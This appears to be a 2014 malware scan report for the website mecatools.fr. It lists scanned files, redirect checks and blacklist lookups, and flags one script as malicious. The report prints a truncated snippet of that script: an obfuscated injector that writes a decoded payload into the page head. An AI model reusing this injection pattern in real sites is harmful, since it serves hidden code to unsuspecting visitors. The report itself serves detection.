Scanned pages/files
Request | Server response | Status |
http://mecatools.fr/ | 200 OK Content-Length: 34957 Content-Type: text/html | clean |
http://mecatools.fr/./includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21967 Content-Type: text/javascript | clean |
http://mecatools.fr/includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E Antivirus reports:
http://mecatools.fr/./ | 200 OK Content-Length: 34936 Content-Type: text/html | clean |
http://mecatools.fr/././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://mecatools.fr/./includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
http://mecatools.fr/././ | 200 OK Content-Length: 34936 Content-Type: text/html | clean |
http://mecatools.fr/./././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://mecatools.fr/././includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
http://mecatools.fr/./././ | 200 OK Content-Length: 34943 Content-Type: text/html | clean |
http://mecatools.fr/././././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
http://mecatools.fr/./././includes/secjs.js | 200 OK Content-Length: 2827 Content-Type: application/javascript | malicious |
http://mecatools.fr/././././ | 200 OK Content-Length: 34957 Content-Type: text/html | clean |
http://mecatools.fr/./././././includes/fonctions.js | 200 OK Content-Length: 5852 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mecatools.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 17 Apr 2014 22:26:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE
Set-Cookie: 60gpBAK=R1224196865; path=/; expires=Thu, 17-Apr-2014 23:33:52 GMT
Set-Cookie: 60gp=R717391862; path=/; expires=Thu, 17-Apr-2014 23:31:54 GMT
Set-Cookie: PHPSESSID=b0e82414f54577d84521838dff43d0ad; path=/
Set-Cookie: javascript=deleted; expires=Wed, 17-Apr-2013 22:26:31 GMT
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: mecatools.fr
Referer: http://www.google.com/search?q=mecatools.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mecatools.fr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mecatools.fr/
Result: mecatools.fr is not infected or malware details are not published yet.